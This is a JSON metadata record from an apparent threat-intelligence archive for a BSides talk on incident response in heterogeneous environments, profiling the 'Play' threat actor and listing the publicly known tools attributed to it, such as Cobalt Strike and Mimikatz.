Source: https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment"
	],
	"report_names": [
		"bsides-ir-in-heterogeneous-environment"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439109,
	"ts_updated_at": 1775826756,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/84419dc1e56b82b8ff79db2f7519b2b51785bab3.pdf",
		"text": "https://archive.orkl.eu/84419dc1e56b82b8ff79db2f7519b2b51785bab3.txt",
		"img": "https://archive.orkl.eu/84419dc1e56b82b8ff79db2f7519b2b51785bab3.jpg"
	}
}